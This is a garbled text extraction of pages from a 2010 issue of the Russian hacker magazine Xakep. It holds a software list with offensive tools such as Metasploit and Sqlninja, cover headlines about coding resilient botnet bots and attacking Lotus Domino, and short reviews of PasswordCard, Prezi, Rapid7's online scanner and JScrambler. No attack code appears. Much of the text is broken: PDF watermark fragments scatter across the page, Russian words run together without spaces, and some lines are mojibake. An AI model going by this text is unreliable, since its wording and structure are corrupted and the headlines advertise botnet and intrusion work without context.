SIM IM 0.9.4.3

Xchat 2.8.8

Lightspark 0.4.0

>Security

LFT 3.1

Nufw 2.4.2

OpenScap 0.5.11

Suricata 0.9.1

Keychain 2.7.1

Whatweb 0.4.3

Joomla sqli sploiter

Column finder

Darkjumper 5.7

Iptables 1.4.8

Clamav 0.96.1

Metasploit Framework 3.4.0

Hashkill 0.2.0

Ctunnel 0.3

Graudit 1.6

Xplico 0.5.7

Sqlninja 0.2.5

iScanner 0.5

Complemento 0.7.6

Samhain 2.7.0

Authfail 1.1.7

>Server

Sipwitch 0.8.3

Cherokee Webserver 1.0.1

Adchpp 2.5

Kamailio 3.0.2

Radmind 1.13.0

Fapws3 0.5

Socks Server5 3.8.2

LFTP 4.0.8

RabbIT 4.6

Ziproxy 3.0.1

MySQL 5.1.47

Apache 2.2.15

BIND 9.7.0

CUPS 1.4.3

DHCP 4.1.1

OpenLDAP 2.4.22

OpenSSH 5.5

OpenVPN 2.1.1

Sendmail 8.14.4

Asterisk 1.6.2

>System

ATI Catalyst 10.5

VMWare Workstation 7.1

XNeur+gXNeur 0.9.9

SystemRescueCd 1.5.4

Open vSwitch 1.0.0

VirtualBox 3.2.2

ZFS-Fuse 0.6.0

Linux Kernel 2.6.34

DOSBox 0.74

Ganeti 2.1.2

Memtest86+ 4.10

nVidia 195.36.24

YASMon 0.0.5

OpenAFS 1.4.12.1

ROXTerm 1.18.3

Wine 1.0.1

Wmc2d 2.03

№ 07(138)ИЮЛЬ 2010

x

ПОДГЛЯДЫВАЕМ ЧЕРЕЗ WEB-КАМЕРУ СТР. 110

 

 

w

w

 

 

D

 

w

 

 

 

 

P

 

 

 

 

 

 

 

 

 

F

 

.

 

 

 

 

 

 

 

p

Click

 

 

 

 

 

-

 

f

 

 

 

 

 

X

 

d

 

 

 

 

 

 

 

 

-

 

to

 

 

 

 

C

 

x

 

 

 

 

 

h

 

c

 

 

BUY

 

 

 

a

 

h

 

 

 

 

 

n

РЕКОМЕНДОВАННАЯ

 

 

 

 

 

g

 

a

 

 

 

 

 

 

 

 

 

 

 

NOW!

 

e

 

n

 

 

 

 

 

 

 

 

 

 

 

 

E

 

g

 

 

 

 

 

 

 

 

e

 

 

 

 

 

 

 

d

ЦЕНА

.

 

 

 

 

 

 

 

i

c

 

 

 

 

 

 

o

 

 

 

 

 

t

 

 

m

 

 

r

o

 

 

 

 

 

 

 

 

 

 

:

 

 

 

 

 

 

 

 

 

210

 

 

 

 

 

 

 

 

 

р

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

 

 

 

 

ИЮЛЬ 07 (138) 2010

AMAZON S3

 

 

 

 

 

ОБЛАЧНЫЕ ТЕХНОЛОГИИ ДЛЯ

 

 

 

 

 

ХРАНЕНИЯ ФАЙЛОВ И БЭКАПА

 

 

 

 

 

ÑÒÐ. 26

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ÑÒÐ. 52

 

 

 

 

НЕГАСИМЫЙ

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ÂÑÅ

 

ФАЗЗИНГЕ

 

 

 

 

 

 

 

 

Î

 

 

 

 

 

 

 

 

ОБЗОР БЕСПЛАТНЫХ

БОТНЕТ

 

 

 

 

 

 

 

 

И ФАЗЗЕРАХ

 

 

 

 

 

 

 

 

 

 

АНТИВИРУСОВ

КОДИНГ НЕУБИВАЕМЫХ И

 

 

 

 

 

 

 

 

АТАКА НА LOTUS DOMINO

 

 

 

 

 

 

 

 

АБУЗОУСТОЙЧИВЫХ БОТОВ

 

 

 

 

 

 

 

 

ИСТОРИЯ SKYPE

 

 

 

 

 

 

 

 

ÑÒÐ. 107

 

 

 

 

 

 

 

 

 

 

 

 

w

w

w

 

 

 

P

 

 

 

 

 

 

 

 

 

D

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

F

 

 

 

 

.

 

 

 

 

 

 

 

 

 

 

 

p

 

 

 

 

 

 

 

 

-

 

 

 

 

d

 

 

 

 

 

 

 

 

X

 

 

 

 

f Click

 

 

 

 

 

C

 

 

 

 

-

 

 

to

 

 

 

 

 

 

 

 

x

 

 

 

 

 

 

h

 

 

 

 

c

 

 

 

BUY

 

 

 

a

 

 

 

 

h

 

 

 

 

 

 

n

 

 

 

 

 

 

 

 

 

 

g

 

 

 

 

a

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

NOW!

 

e

 

 

 

 

n

 

 

 

 

 

 

 

 

 

 

 

 

 

 

E

 

 

 

 

g

 

 

 

 

 

 

 

 

 

e

 

 

 

 

 

d

 

 

 

 

.

 

 

 

 

 

 

 

 

i

 

 

 

 

c

 

 

 

 

 

 

 

 

 

 

 

o

 

 

 

 

 

 

t

 

 

 

 

m

 

 

 

r

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

F

 

 

 

 

 

 

t

 

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

r

 

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

to

 

 

 

 

 

UNITS

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

o

m

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

 

.c

 

 

 

 

 

p

 

 

 

 

 

HTTP://

 

 

 

 

 

 

g

 

 

 

 

 

 

 

df

 

n

e

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

WWW2

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Простой способ запомнить пароли

Создаем эффектные

PASSWORDCARD PREZI презентации www.passwordcard.org www.prezi.com

Сделатьодиннадежныйпароль(аляb15DbaL) — легко. Нопопробуй удержатьвголовепаролидлявсехсервисовсразу! Чтобыпоборотьжеланиевездеиспользоватьодинитотжепасс, естьнескольковыходов. Да, можнодоверитьпароликакому-тостороннемусервису, обращаяськнему каккшпаргалке. Аможнопойтинамаленькуюхитрость. ИдеязаключаетсявиспользованиитакназываемойPasswordCard — небольшойкарточкистаблицейсимволов, которуючастовыдаютклиентамонлайн-банка вфинансовыхучреждениях. Каждаястрокатаблицыимеетсвойцвет, а каждыйстолбецобозначензапоминающимсясимволом. Выбраводнуиз пар«цвет-символ», мыполучаемпервыйсимволпароля, адальшедля егосоставленияиспользуемкакой-нибудьпростойпринцип, например, выписываемсимволыподиагонали. Врезультатеполучаетсянадежный пароль, требующийминимуминформациидлязапоминания, икарточка, которуюможнобезопаснодержатьприсебе. Сгенерироватьуникальную карточкупоключевомусловукакразипоможетсервисPasswordCard.

КогдаребятаизMicrosoft нахваливаютновыеэффекты, которыепоявилисьвPowerPoint 2010 длясозданияпрезентаций, вответостаетсятолькоулыбаться. Виделибыонипрезенташки, которыепозволяетсоздать онлайн-сервисPrezi :). Восновесервисалежитоднаоченьпростаяидея: вседанныедляслайдовразмещаютсянаодномоченьбольшомполотне, апереходмеждуслайдамиосуществляетсяспомощьюэффектного перемещенияточкиобзора. Принеобходимостикамера, смотрящая наэтополотно, отдаляется, чтобыпоказатьбольшеинформации, или приближается, чтобыакцентироватьвниманиенанекоторыедетали. Эффективностьтакойпрезентациисложнопередатьсловами, ноесли тыпосмотришьпримерынасайте, тосразузахочешьиспользоватьее,

чтобыслучшейстороныпредставитьсвойкурсач, дипломили, возможно, проектстартападлявенчурногоинвестора:).

Коммерческий сканер безопасности онлайн

RAPID7 ONLINE SCAN rapid7.com/freescan.jsp

КомпанияRapid7, специализирующаянаинформационнойбезопасности, известнатем, чтоприобрелапроектMetasploit ивкладывает

внегобольшиеденьги. Вместестем, главнымпроектомкомпании остаетсясканербезопасностиRapid7 NeXpose. Несмотрянато, что продуктпродаетсязабольшиеденьги(хотяунегоиестьурезаннаябесплатнаяверсия), каждыйможетпопробоватьеговдействии, натравив насерверысвоейкомпании(да-да-да). Зарегистрировавшисьнасайте, тыполучаешьвозможностьпросканироватьонлайн-версиейсканера двахоста. Приэтомничегоустанавливатьнепотребуется, весьсофт работаетнасторонеразработчиков. Сканированиеможетзанятьнекотороевремя, нотебедаженеобязательнождать: простозайдивличный кабинетчерезнекотороевремяиищиподробныйотчетосканировании

вразделеReports.

Обфускация кода на

Javascript

JSCRAMBLER www.jscrambler.com

НасвоейежегоднойконференцииGoogle I/O сотрудникипоискового гигантазаявили: с2004 годаневыходилониоднойзначимойдесктопной программы. Подкрепляясвоисловаобабсолютномпревосходствевебплатформы, онидажеоткрылимагазиндляпродажионлайн-приложений (онпокадоступентолькокорпоративнымпользователямGoogle). Но еслидлязащитыдесктопныхпрограммсуществуетнемалокрипторови обфускаторов, тозащититьклиентскуючастьвеб-приложения, написанную, какправило, наJavaScript, довольносложно. Чтобыуберечьсорцы отплагиата, приходитсяприменятьтакназываемыескрамблеры, которые чрезвычайноусложняютчтениекода. Существуетмногобестолковыхрешений, новот-вотпоявитсядостойныйобфускатор— проектJScrambler. Разработчикиужесейчаспредлагаютбета-тестерамнесколькоуникаль- ныхалгоритмов, спомощьюкоторыхскрамблерделаетсорцынечитаемыми. Да, открытыйдоступпоказакрыт, норазработчикиактивнорассылают приглашенияпопервомузапросу.

144

XÀÊÅÐ 07 /138/ 10

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

F

 

 

 

 

 

 

t

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

 

 

 

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

to

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

m

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

 

 

F

 

 

 

 

 

 

t

 

 

 

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

 

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

 

 

t

 

 

 

D

 

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

w Click

 

 

 

 

 

 

 

m

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

o

 

 

 

.

 

 

 

 

 

 

 

.c

 

 

 

 

p

 

 

 

 

 

 

g

 

 

 

 

 

 

df

 

 

 

 

n

e

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Соседние файлы в папке журнал хакер